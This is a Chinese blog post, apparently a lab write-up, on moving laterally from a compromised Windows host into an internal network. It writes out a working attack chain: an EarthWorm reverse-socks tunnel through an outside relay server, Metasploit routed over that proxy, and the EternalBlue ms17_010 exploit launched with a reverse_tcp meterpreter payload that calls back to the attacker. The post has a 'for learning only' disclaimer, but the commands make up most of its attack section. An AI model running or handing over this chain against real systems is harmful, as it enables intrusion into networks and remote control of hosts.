0x01 前言和实验环境
文中提及的部分技术可能带有一定攻击性,仅供学习和交流用途,禁止非法使用,造成的一切后果,本人不承担任何责任!

你通过某些技术手段拿下了对方一台主机,这台主机正好在内网之中,这时候就要想办法扩大战果,通过横向移动等一系列操作拿下其他主机,本文介绍一下如何在自己本地内网中通过metasploit中的ms17_010拿下目标内网中的其他机器。
拓扑图


实验环境相关主机:
攻击机:物理机windows 10、虚拟机kali_linux、cs服务器(ubuntu16.04)
受害者机器:windows 7_x64、windows 2008_x64

网络环境:
攻击机内网:192.168.1.0/24
受害者机器内网:192.168.199.0/24

 

 

0x02 开始傻逼表演~
前文已经说过,我们通过cs拿到了对方一台机器的权限

“c:/users/john”文件夹上传一个端口扫描器

探测一下内网情况,发现有内网中有一台主机在线。

设置ew代理:

./ew_for_linux64 -s rcsocks -l 65505 -e 65504
ew.exe -s rssocks -d 101.xxx.xxx.58 -e 65504

ew服务器(ubuntut16.04)出现”rssocks cmd_socket OK!“的时候,代理已经成功!

启动虚拟机kali_linux的metasploit

metasploit设置socks代理:

set proxies socks5:101.xxx.xxx.58:65505
set ReverseAllowProxy true

ms17_010开始它的表演

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp   ###payload要设置好,否则会失败。。。

set lhost 192.168.1.222

set rhost 192.168.199.199

exploit

表演结束,跑路~

0x03 总结

本人是个学习中的菜逼,大佬别喷我。

Categories: 内网渗透

发表评论

电子邮件地址不会被公开。 必填项已用*标注